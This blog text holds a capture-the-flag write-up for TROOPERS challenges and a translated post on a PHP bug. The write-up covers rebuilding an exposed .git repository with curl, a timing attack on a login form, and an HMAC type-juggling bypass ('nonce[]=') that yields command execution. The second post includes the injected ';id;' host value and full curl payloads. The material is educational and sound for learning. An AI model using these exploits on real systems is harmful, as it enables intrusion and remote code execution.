Alright, it seems there is/was a login form somewhere. That doesn't help us as of right now, there could have been something useful here though. Secondly there is this:

body.error {
  background-image: url("/static/images/children-593313.jpg");
}

body.noaccess {
  background-image: url("/static/images/chain-690088.jpg");
}

body.notfound {
  background-image: url("/static/images/adult-art-black-and-white-368855.jpg");
}

body.badrequest {
  background-image: url("/static/images/badrequest.jpg");
}

This info tells us more about the folder structure of the site. Maybe they misconfigured their server to let us traverse directories?

daniel biegler fucss forbidden

Was worth a try, I guess. The 404 Page doesn't hold anything of value either.

Now we exhausted the useful information inside the initial sites, but remember this:

User-agent: Evil Imp/3.7
Allow: /login/
Allow: /admin/
Allow: /api/
Disallow: /

What's interesting here is the user agent, Evil Imp/3.7, that gets mentioned in the beginning. 

This is your user agent right now (shown interactively on the original page):

Websites can use this information to serve you different types of content. Just as a quick example, when your user agent mentions an older browser, sites might try to increase backwards compatibility by using older syntax in the HTML, JavaScript or CSS.

With this in mind, let's open the disallowed links normally. 

/api leads us to

daniel biegler fucss auth required

/admin redirects us to /login, which looks like this:

daniel biegler fucss login

An interesting detail you'll notice when you type something in is the following:

daniel biegler fucss login format

Sites can request a specific format for input fields via the pattern attribute which, in our case, looks like this:

<input data-error-message="Password required"
data-required="true"
data-type="password"
name="password"
placeholder="Password"
type="password"
pattern=".{32}">

In the pattern .{32} the dot . is a wildcard, meaning any character fits, be it a letter, digit or special character. This tells the browser to automatically block passwords that are not exactly 32 characters long. You could, in theory, manually submit passwords that don't fit the pattern - sure. I'll take an educated guess here though and say that this is probably not the intended solution. 

# Time to become Evil

What do those sites look like when we use the aforementioned user agent of Evil Imp/3.7?

In Chrome/Chromium you can change your user agent by opening the Developer Tools (press F12) and switching to the Network Tab. In the three-dot-menu you can find the Network conditions option.

daniel biegler network conditions

This'll let you specify your user agent like so:

daniel biegler network conditions user agent

Back to checking out the site.

The index page /, /api, /admin and /login all return

daniel biegler fucss git gud

Finally! Our first little 'win', as in, our first proper clue!

.git here refers to the popular version control software Git

To summarise quickly for those that are not very familiar with this technology, Git basically helps people and robots keep track of changes to files. It stores information regarding when each file was changed, what was changed, by whom and for what reason.

Figuratively speaking, this information makes attackers salivate.

# Investigate /.git/

Since every page now returns the beautiful Rainbow-Imp-Animation, it's time to remove our custom user agent from earlier.

Problem is that we get greeted by 

daniel biegler fucss forbidden

when we try to access /.git/ because directory traversal was deactivated (remember earlier).

So what happens if we don't want to traverse directories and we target a specific file inside the folder? Since Git got mentioned we can simply look up the internal file structure of Git via their documentation or the man page ( gitrepository-layout ).

HEAD

   [...] a valid Git repository must have the HEAD file; [...]

Source: git-scm.com, as of 2018-10-05 

So let's simply check via cURL:

curl https://db.fishbowl.tech/.git/HEAD
ref: refs/heads/master

Bingo!

Non-directory-files don't seem to be forbidden!

Remember that Git can also track why changes were made. One can write about their changes in the so called commit message, which is stored in the COMMIT_EDITMSG file. 

curl https://db.fishbowl.tech/.git/COMMIT_EDITMSG
Whooooopsie

Making your code involuntarily publicly accessible can be a big whoopsie, yeah.

# Attack

By getting the individual pieces of the repository we could rebuild it locally and hopefully look up how the authentication at /login works.

So let's create a local repository and fill it with the data from the site.

mkdir repo && cd repo && git init
Initialized empty Git repository in /tmp/repo/.git/

When we read the HEAD file earlier, it told us that the currently active branch is called 'master'. This in turn enables us to look up the commit object at the tip of said branch.

curl https://db.fishbowl.tech/.git/refs/heads/master
9a932cc71e599ab95e588820d1dfeca8cc63313a

Now that we know the hash, let's try to get the corresponding object and pretty-print it:

mkdir .git/objects/9a
curl https://db.fishbowl.tech/.git/objects/9a/932cc71e599ab95e588820d1dfeca8cc63313a > .git/objects/9a/932cc71e599ab95e588820d1dfeca8cc63313a
git cat-file -p HEAD 
tree 87b769291b90999ec479f93f375cc13f3ed71a08
parent 4388a30f98f830b0baef344d631236feaacfb26f
author devops <devops@fishbowl.tech> 1525277577 +0200
committer devops <devops@fishbowl.tech> 1538218054 +0200

Whooooopsie

There we see the "Whooooopsie" again! We could even write a friendly E-Mail to the commit author. :-)

But more importantly are the tree and parent hashes, those allow us to find more files and commit messages. Let's get the parent.

mkdir .git/objects/43
curl https://db.fishbowl.tech/.git/objects/43/88a30f98f830b0baef344d631236feaacfb26f > .git/objects/43/88a30f98f830b0baef344d631236feaacfb26f
git cat-file -p 4388a30
tree a66997e5f94a288b92c1c53a342ba95cee37edad
author devops <devops@fishbowl.tech> 1518597252 +0100
committer devops <devops@fishbowl.tech> 1538218054 +0200

Initial Commit

Hey, this one has no parent! Let's proceed with the first tree then

mkdir .git/objects/87
curl https://db.fishbowl.tech/.git/objects/87/b769291b90999ec479f93f375cc13f3ed71a08 > .git/objects/87/b769291b90999ec479f93f375cc13f3ed71a08
git cat-file -p 87b7692 
100644 blob d5d0d15ef3c8fe414808223edee33f37fd52134e    readme.txt

Here we can see that a readme.txt is stored in that tree. Grab it!

mkdir .git/objects/d5
curl https://db.fishbowl.tech/.git/objects/d5/d0d15ef3c8fe414808223edee33f37fd52134e > .git/objects/d5/d0d15ef3c8fe414808223edee33f37fd52134e
git cat-file -p d5d0d15
# TODO

Migrate codebase into version control system

Nothing interesting in the readme.txt. Next tree.

mkdir .git/objects/a6
curl https://db.fishbowl.tech/.git/objects/a6/6997e5f94a288b92c1c53a342ba95cee37edad > .git/objects/a6/6997e5f94a288b92c1c53a342ba95cee37edad
git cat-file -p a66997e
100644 blob d5d0d15ef3c8fe414808223edee33f37fd52134e    readme.txt
100644 blob 9102077ff36290750e5af1551c7a9bad090ec59b    secret.txt

Aaaah, secret.txt sounds interesting.

mkdir .git/objects/91
curl https://db.fishbowl.tech/.git/objects/91/02077ff36290750e5af1551c7a9bad090ec59b > .git/objects/91/02077ff36290750e5af1551c7a9bad090ec59b
git cat-file -p 9102077
[REST in Pieces]
    rtfm(hash_hmac)
[Access Denied]
    it's definitely NOT SQLi
    Take your TIME

Yeahhhhh...

I guess the hint that it's "NOT" SQL Injection is nice to have.. 

I want to be honest here, I was pretty disappointed when reading the secret.txt and tried coming up with a new approach for a whole hour.

With nothing left to see inside the /.git/ folder, I just dabbled with the /login page for a while which looked like this:

daniel biegler fucss login invalid username

I was wondering why it specifically says that the username is invalid instead of something more generic. So naturally I tried to look for a different error message by trying out usernames like:

  • 'root',
  • 'Fishbowl',
  • 'Evil Imp/3.7'

and last but not least:

  • 'admin'.

daniel biegler fucss login username or password wrong

Another puzzle piece found! 

What I didn't specifically mention so far is that I monitored the response headers of my login attempts to get a better understanding of the whole login process. That luckily resulted in me noticing a curious new response from the server!

Normally the server responds, amongst other things, with these:

...
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

After trying with the 'admin' user, suddenly this new header sneaked in:

...
X-Content-Type-Options: nosniff
X-DBQuery-Perf: 6ms
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

Remember the challenge description?

During his development on the custom DBMS and secret investigations, our insider intern figured that the performance issues might have some security impact on the web interfaces authentication as well.

Database Query Performance? 'Take your TIME'?

hangover calculations

Oh my, a Timing Attack!?

By measuring the time it takes the server to process our query, we can guess the correctness of our query! 

Let's say we have a server that validates a passphrase. Said server goes from left to right and needs 1 second per character.

Comparing  'ABCD' and 'ABXD':

daniel biegler variable time string comparison

(I made this graphic myself, do you like it? Let me know!)

Notice how we didn't compare the two 'D' characters? As soon as we see a non-matching character, we stop the comparison. This is problematic.

This allows attackers to estimate the correctness of the provided passphrase by measuring the time. The longer the comparison takes, the better!
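In code, such a variable-time comparison could look roughly like the following Python sketch (a deliberately simplified illustration, not the challenge's actual implementation):

def insecure_equals(secret, guess):
    if len(secret) != len(guess):
        return False
    for expected, provided in zip(secret, guess):
        # (imagine every single comparison being slow, e.g. one database lookup each)
        if expected != provided:
            return False   # early exit: 'ABCD' vs 'ABXD' never compares the 'D's
    return True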

Sidenote:
This example is pretty drastic because comparing a single character almost never takes a whole second, but don't dismiss this attack. It is a real attack vector which you should look out for, see this paper from the Blackhat Conference in 2015 by Timothy D. Morgan and Jason W. Morgan.

So let's put this theory to the test by doing a couple of requests per character and averaging them afterwards. (I chose to do this in Python with the requests library, more on the specifics later.)
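A minimal sketch of such a measurement loop could look like the following. To be clear, this is not my actual attack script (that one is linked at the end of this section); the field names and the 32-character padding are assumptions based on the login form we saw earlier.

import string
import requests  # third-party library: pip install requests

URL = "https://db.fishbowl.tech/login"
TRIES = 5  # requests per candidate character, averaged afterwards

def average_response_time(candidate):
    password = candidate.ljust(32, "_")  # the form wants exactly 32 characters
    total = 0.0
    for _ in range(TRIES):
        response = requests.post(URL, data={"username": "admin", "password": password})
        total += response.elapsed.total_seconds()
    return total / TRIES

timings = {c: average_response_time(c) for c in string.printable.strip()}
print(sorted(timings, key=timings.get, reverse=True)[:3])  # slowest candidates first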

daniel biegler timing attack first letter labeled

Now if that is not suspicious, I don't know what is. Let's try using the found 'S' and appending a second character.

daniel biegler timing attack second letter labeled

It seems like the first character 'S' might be correct, every single response took at least 200ms. It also seems like the second character is '0' (zero).

With these findings, it looks like a correct character adds approximately 200ms response time. If we look for the third character, our worst case time complexity amounts to roughly

400ms per character
* 99 printable ascii characters
+ 600ms for the found character
= 40200ms * n-retries
= 40.2 seconds * n-retries


This is starting to look pretty uncomfortable, especially if you keep in mind that this is only the third character out of 32.

Adding the sequential tries amounts to a worst case of +165 minutes with 1 request per character.

This doesn't sound impossible, but uncomfortable nonetheless. We could speed it up by making multiple requests simultaneously, but first let's try to deepen our knowledge of how the comparison works.

What happens if the first character is wrong while the second character is correct? 

daniel biegler timing attack second letter solo labeled

NICE. This means we don't have to include prior found characters, which results in drastically reduced worst case time complexities. Optimistically this results in:

20ms per character
* 99 printable ascii characters
+ 200ms for the found character
= 2.18s * 32 for every character
= 1.16min * n-retries


Only a minute, that's over a 99% time improvement, when compared with the naive bruteforce from before.

Here is my timing attack in action. (video is sped up)

Logging in with 'admin' and our newly found password, we finally reach our goal.

twitter

Code used for the timing attack can be found here.

This concludes the first challenge. Take a breather, this has been quite the extensive writeup.

If you enjoyed this you might enjoy my other article about learning binary code interactively.

Anyways, on to the next challenge:

# 2. REST in Pieces

Our insider intern discovered an unauthenticated API endpoint within the database appliance. Along with this information we were able to exfiltrate a code snippet of this endpoint. You can find it on kleber.io or pastebin. Locate and examine the endpoint.

This challenge is a little different. Here we are provided with the following code snippet (you don't have to study it completely yet, I'll go over it - step by step):

<?php

/**
 * rest.php
 *
 * Remote Execution Service Tomato™
 *
 * @category   REST
 * @package    Fishbowl 0day DB
 * @author     @hnzlmnn <hnzlmnn@fishbowl.tech>
 * @endpoint   /api/vegan/rest
 * @license    MIT
 * @version    1.0
 */

require_once("../../libs/tomato.php");

$secret = getenv('secret');
$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

if (empty($command['action'])) {
	error(400);
}

if (!in_array($command['algo'], hash_hmac_algos()) || empty($command['hash'])) {
	error(400);
}

if (!empty($command['nonce'])) {
	$secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
	error(401);
	exit;
}

passthru($command['action']);

# Reconnaissance

First of all, let's check out the mentioned API endpoint and see what we're dealing with.

daniel biegler fucss tomato get 01

Judging from the code I guess this is supposed to resemble a tomato. Let's send another request.

daniel biegler fucss tomato get 02

Oh, you get different facts about the tomato. Neat.


Inside the response headers we see a juicy status code

Request URL: https://db.fishbowl.tech/api/vegan/rest
Request Method: GET
Status Code: 400 Tomato

Which makes sense if we go through the source. 

$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

if (empty($command['action'])) {
	error(400);
}

If we do not provide an action, we error out with a 400 status code. To verify that we indeed have the proper file, I'd suggest trying to reach the 401 status code. 

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
	error(401);
	exit;
}

For this, we need to check where all the variables, i.e. algo, action, secret and hash, are being set.

$secret = getenv('secret');
$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

algo and $secret are already being set for us. Next down the line is hash, which we can blindly set via hash=a; only action needs a little attention. We have to provide a base64 encoded string. Let's encode 'a' for example's sake.

printf a | base64
YQ==

Now we can make a request that should result in a 401 Error.

curl -X POST -i -d 'action=YQ==&hash=a' https://db.fishbowl.tech/api/vegan/rest
HTTP/1.1 401 Tomato
# ...

Works like it's supposed to!

# Planning the attack

Since we have the source code this time, we have the ability to test our exploit on our machine, offline. 

Let's copy the source and spin up a PHP Server.

cp source.php test_exploit.php
php -S 0.0.0.0:8080

Now let's clean up the file.

Remove the require_once, replace its error methods with our own and provide some useful info.

$secret = getenv('secret');
$command = array(
        'algo' => "sha256",
        'nonce' => $_POST['nonce'], 
        'hash' => $_POST['hash'], 
        'action' => base64_decode($_POST['action']) 
);

if (empty($command['action'])) {
        echo "1. Error 400: No 'action'!\n";
}

if (!in_array($command['algo'], hash_hmac_algos()) || empty($command['hash'])) {
        echo "2. Error 400: No 'hash'! \n";
}

if (!empty($command['nonce'])) {
        echo "You provided 'nonce': ".$command['nonce']."\n";
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
        echo "3. Error 401: hash_hmac does not match hash! \n";
        echo "  - hmac: ".hash_hmac($command['algo'], $command['action'], $secret)."\n";
        echo "  - hash: ".$command['hash']."\n";
        echo "Exiting now.\n";
        exit;
}

// passthru($command['action']);
echo "You got code execution with 'action' being: ".$command['action'];

Here is what an example request looks like now.

curl -X POST -d "" 0.0.0.0:8080/test_exploit.php
1. Error 400: No 'action'!
2. Error 400: No 'hash'! 
3. Error 401: hash_hmac does not match hash! 
  - hmac: b613679a0814d9ec772f95d778c35fc5ff1697c493715653c6c712144292c5ad
  - hash: 
Exiting now.

With such clean feedback from ourselves, we can inch forward.

curl -X POST -d "action=YQ==&hash=a" 0.0.0.0:8080/test_exploit.php 
3. Error 401: hash_hmac does not match hash! 
  - hmac: 9615a95d4a336118c435b9cd54c5e8644ab956b573aa2926274a1280b6674713
  - hash: a
Exiting now.

But, now comes the third roadblock: We need to know what the result of hash_hmac is.

As an attacker, my mind is always looking for things that I can influence i.e. 'over what parameters do I have what control'. In this case, we already know two out of three parameters.

hash_hmac($command['algo'], $command['action'], $secret)

We know algo and action get set in the beginning:

$command = array(
        'algo' => "sha256",
        // ...
        'action' => base64_decode($_POST['action']) 
);

Let's see what kind of control we have over $secret. There is a way to influence its value by providing nonce.

if (!empty($command['nonce'])) {
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

Again, same thought process. We already know what algo gets set to and $secret is being assigned here:

$secret = getenv('secret');

Sadly this doesn't give us an opportunity to influence its value, though. That leaves only nonce which gets assigned at the top.

$command = array(
        // ..
        'nonce' => $_POST['nonce'], 
        // ..
);

So we control the raw value of nonce. I emphasize raw here because we are able to set not only the value of nonce, but also - more importantly - its type!

When posting information to a site, you are able to specify that the argument is either a "normal", single value or a list of values.

In the latter case, PHP is nice enough to automatically convert a list to an array!

Since PHP is a Loosely Typed language, this can sometimes lead to unexpected behaviour when you don't check the type of the variable you're working with. A very basic example that can bite you in the butt is weak comparisons of strings and numbers.

Strings starting with a number automatically get converted to integers/floats, see:

php > var_dump(123 == 123);
bool(true)

php > var_dump(123 == "123");
bool(true)

php > var_dump(123 == "123.0");
bool(true)

php > var_dump(123 == "123example");
bool(true)

php > var_dump(123 == "example123");
bool(false)

So that raises the question: What happens to hash_hmac when we provide an array instead of a string?

php > var_dump(hash_hmac('sha256', array(), "secret"));
PHP Warning:  hash_hmac() expects parameter 2 to be string, array given in php shell code on line 1
NULL

PHP is so kind and warns us about the type but does not error out! It just keeps running and returns NULL.

Remember, we're trying to influence the assigned value of $secret, which we now can!

if (!empty($command['nonce'])) {
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

When providing a list for nonce, $secret is gonna be NULL!

This in turn, means that we now know all the parameters of the call to hash_hmac here

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
	error(401);
	exit;
}
  1. algo has the fixed value "sha256"

  2. action = base64 decoded $_POST['action']

  3. $secret is going to be NULL because we control nonce

  4. hash we control via $_POST['hash']

# Attack

Finally, let's calculate the values we need: action and hash

// action
php > echo base64_encode("id");
aWQ=

And for the hash we can use our PHP Server:

curl -X POST -d "action=aWQ=&hash=a&nonce[]=" 0.0.0.0:8080/test_exploit.php
You provided 'nonce': Array
3. Error 401: hash_hmac does not match hash! 
  - hmac: 34ce0b031abf5f1f67ab9dfdae781582fdec327df7838c70fcefa9a68e49b909
  - hash: a
Exiting now.

Now we have all the information needed to construct our real payload.

curl -X POST -d "action=aWQ=&hash=34ce0b031abf5f1f67ab9dfdae781582fdec327df7838c70fcefa9a68e49b909&nonce[]=" https://db.fishbowl.tech/api/vegan/rest
-----BEGIN FISHBOWL FLAG-----
v4LlsWnBMbNXsHXhGpet22bp1elj8F8FDc0eglJrsDrj0Usj
3h8B9XgD+rE+4yX6YAbbx1lz7sZLu76r5t4fY07S+H/1sDKG
+tiEjLnqKmF4Vd44auh75LwMb/1V5/J9xBDdKdsXQW8aTWov
NDzwDaeAnrCYo7oR5OEPEEMlapufZWnrIlDrbQEueyPArNYb
o/fPnJBj7dtVXrEV64qwHBKNll1Kqo45+Xa4w3Jb04g9i1EE
+7+oYAx8RfxOCtLrfFEnMpCTtdn8MMRoUt4IQDQgV2AimxnH
k0qWr6d27dkn07BiJSTZ30Hjj/2GjW0xxfNHXxfey3nFKCEX
G6VcemwSOcbkq0NI1EFweXe/f104eGx+fpK56mXzrBVwFCpq
YffkwzD+K08Xw0HDEUyVVFqpgUmLHi0j4awsPlZLq/b5xC1z
R7ZbKOXyC/VdouFmjCTQG5Cw2fsP7X4j0bbiclMaXYLb0msl
xeUpiCw8DpTXY9XE6btnWCKhkjiWlAGVJq/DX/j83Q8VhGgK
Mb6/7WS8EzyWNU5TyzdSLB/0Gqd24fVBY7pgPlcPRkQFFhE1
AsHGSR+e/MlZU5OWKZapyzU4j5Ua4fBC5u5XBNiVxZK/RxvV
I2So7vPwiFxcO4QWkte9DKp+A452wR0dMcjhwvDwwpw68BwP
FLqVxxdKA1Y=
-----END FISHBOWL FLAG-----

And there you have it! A flag!

# Closing words

I genuinely enjoyed solving the challenges and creating the writeup. If I could get an invite for the TROOPERS Conference, that would mean the world to me. When I solved the challenges I felt so giddy with excitement; here's my original tweet from way back in October.

Please make it happen TROOPERS Team. <3

Thank you all for reading, really do appreciate it.

# Update 2018-12-18

I got invited to TROOPERS!! <3

Thank you so much.

]]>
'Finde den tödlichen Bug' - oder: Warum niemand PHP mag https://www.danielbiegler.de/blog/finde-den-toedlichen-bug-oder-warum-niemand-php-mag/ https://www.danielbiegler.de/blog/finde-den-toedlichen-bug-oder-warum-niemand-php-mag/#comments Fri, 06 Apr 2018 22:26:00 +0000 php hack security infosec https://www.danielbiegler.de/blog/finde-den-toedlichen-bug-oder-warum-niemand-php-mag/ Weiterlesen

]]>

Recently I came across a tweet by the user @xxByte in which he asked, using the following code example, where the "deadly bug" is.

With it, I'll try to show you why so many programmers are averse to PHP.

phpmeme
"You are without doubt the worst programming language I've ever heard of."
"BUT - you have heard of me!"


Tip: I'll go through the code step by step; there's no need to understand the whole block just yet.
<?php
if(empty($_POST['hmac']) || empty($_POST['host'])) {
	header('HTTP/1.0 400 Bad Request');
    exit;
}

$secret = getenv("SECRET");

if(isset($_POST['nonce']))
	$secret = hash_hmac('sha256', $_POST['nonce'], $secret);
    
$hmac = hash_hmac('sha256', $_POST['host'], $secret);

if($hmac !== $_POST['hmac']) {
	header('HTTP/1.0 403 Forbidden');
    exit;
}

echo exec("host ".$_POST['host']);
?>

What does the code do?

Roughly speaking, it offers a service that shows you the IP addresses of domains. For example, if I want to open a website, my computer has to know where (at which address) the site lives.
For that, the little program host is used here.

That can look like this:

host google.de
google.de has address 172.217.21.227
google.de has IPv6 address 2a00:1450:4001:806::2003

Let's go

At first glance, line 19 should immediately catch your eye.

echo exec("host ".$_POST['host']);

If you want to send data to the server, you can do that via a so-called POST request. Description from Wikipedia:

sends unlimited amounts of data, depending on the physical capacity of the server in use, to the server for further processing [...]

PHP gives you access to this data through the variable $_POST, which means that we as users can (more or less) control this variable.

According to the PHP docs, exec() does the following:

exec — Execute an external program

It would be in an attacker's interest to, for example, run a database program in order to steal, set or delete data.

So our goal is already clear, but how do we get there?

The crux is here:

$hmac = hash_hmac('sha256', $_POST['host'], $secret);
		
if($hmac !== $_POST['hmac']) {
	header('HTTP/1.0 403 Forbidden');
	exit;
}

echo exec("host ".$_POST['host']);

We compare the server-side variable $hmac with the user-supplied variable hmac.

If the two are equal, we reach exec(), our goal.
If they differ, the program terminates via exit.

To quickly summarise in general terms:

  1. We send the server data
  2. The server compares data
  3. If the security checks fail, we stop
  4. If they succeed, we execute code

OK, so far so good.

Let's look at how the variable $hmac gets generated.

$hmac = hash_hmac('sha256', $_POST['host'], $secret);

We assign $hmac the result of the function hash_hmac(). A look into the PHP docs tells us:

hash_hmac — Generate a keyed hash value using the HMAC method

Put a little differently, this means that the function uses a message and a key to create a unique string of characters.

For someone who has never dealt with this before, that can be a little hard to grasp, which is why I prepared a small, comparable demo here.

You can enter two things, a message and a key. The result should update automatically.

(Interactive demo on the original page with fields for the message, the key and the resulting string.)

A specific input E_1 always yields a specific output A_1. That output A_1 can only be generated with that specific input E_1. If I enter a different input E_2, I no longer get A_1 but a different output A_2 - aka a 'unique string of characters'.

Try it out: type in anything and watch how the output changes again with every character.

Here are a few real example outputs:

hash_hmac('md5', 'Nachricht', 'Schlüssel');
"eecaaeceed73c85d78c6092feb3fc80b"

hash_hmac('md5', 'kurz', 'abc123');
"bb025ddb83ba74b2340ecec3da11e0d7"

hash_hmac('md5', 'kurz', 'abc1234');
"9e28d712f8f5a71278e41ee904cf06ca"

hash_hmac('md5', 'super mega lange nachricht blabla', 'abc123');
"a1531f330796348872d66400272c9df4"

Do you see what I mean by 'string of characters'?

There are a few interesting properties here which you probably noticed.

  • Every output has the same length, no matter how long the inputs are. (here: 32 characters)
  • The smallest difference, whether in the message or the key, makes the output look drastically different.
  • The strings only contain the following characters: abcdef0123456789

We now know what the string will look like.

What do we need to create it?

We control the message through the variable host (line 12) - let's have a look at where the key $secret comes from.

$secret = getenv("SECRET");

if(isset($_POST['nonce']))
	$secret = hash_hmac('sha256', $_POST['nonce'], $secret);
    
$hmac = hash_hmac('sha256', $_POST['host'], $secret);

First, $secret is set server-side; we don't know what's inside it. Now it gets interesting: if the user has set the variable nonce(?), we overwrite $secret with a new string.

That means:

If we could figure out what's in $secret, we would know both parameters for $hmac and that would get us code execution!

"Um, but we don't even know $secret, it's server-side! So we can't possibly know what hash_hmac() produces."
- You

Yes, normally that would be correct, but now our beloved PHP comes into play.

At the beginning we said that we can send data, here nonce, to the server via a POST request. We have two options: we can tell the server that nonce is either a string - or - a list.

Lists are used to bundle data.

Example: I have a site where users can upload photos. If someone wants to upload 22 photos, the server would need 22 variables to be able to process the uploaded photos. So it makes much more sense to tell the server directly that I'm sending it a list of photos; then it can address all the photos with just one variable.

So what does PHP do when the message in the hash_hmac function is a list?

hash_hmac('md5', array(), 'schlüssel');
"PHP Warning:  hash_hmac() expects parameter 2 to be string, 
array given in php shell code on line 1"
NULL
Shocked face

Just a warning. Unbelievable.

And now comes the very best part: the official documentation says nothing about this behaviour. You only find out about it through user-submitted comments/posts. Here's an excerpt from the docs:

Return Values

Returns the calculated hash as a hexadecimal string, unless raw_output is true, in which case the binary representation of the hash is returned. Returns FALSE if algo is unknown or is a non-cryptographic hash function.

NULL is not mentioned at all.

php joke
"Welcome to PHP, where the syntax is made up and the rules don't matter!"

The attack

Parameter 1:

Let's say we now attack. It would be good to know which user PHP runs as on the server. There's a little program id which shows you the current user and their groups.

So our variable host has to be host=;id;.

Parameter 2:

We generate the correct hmac via PHP:

hash_hmac('sha256', ';id;', NULL);
"206a5d01dee603ea7486045355935ff23d878fd0be5104fd4a465618bfa699bb"

Parameter 3:

Via nonce[]= we tell the server that the nonce should be a list.

Voilà:

curl -X POST -d "host=;id;&hmac=206a5d01dee603ea7486045355935ff23d878fd0be5104fd4a465618bfa699bb&nonce[]=" http://0.0.0.0:8080
uid=1000(phpuser) gid=100(users) groups=100(users),3(sys)

On the server, PHP runs as the user phpuser. Our attack was successful and we have code execution on the server!

Now it's only a matter of time until the attacker finds something interesting and can cause damage.

Conclusion

You really have to be careful; you can't always rely on the official docs. And this is by far not the only vulnerable function.

Making mistakes is really easy in PHP, and that can have fatal consequences.

What we learned today

  • Always assume that incoming user data is malicious, and therefore check the content AND the type of the incoming data.
  • Consult sources other than the official docs.
]]>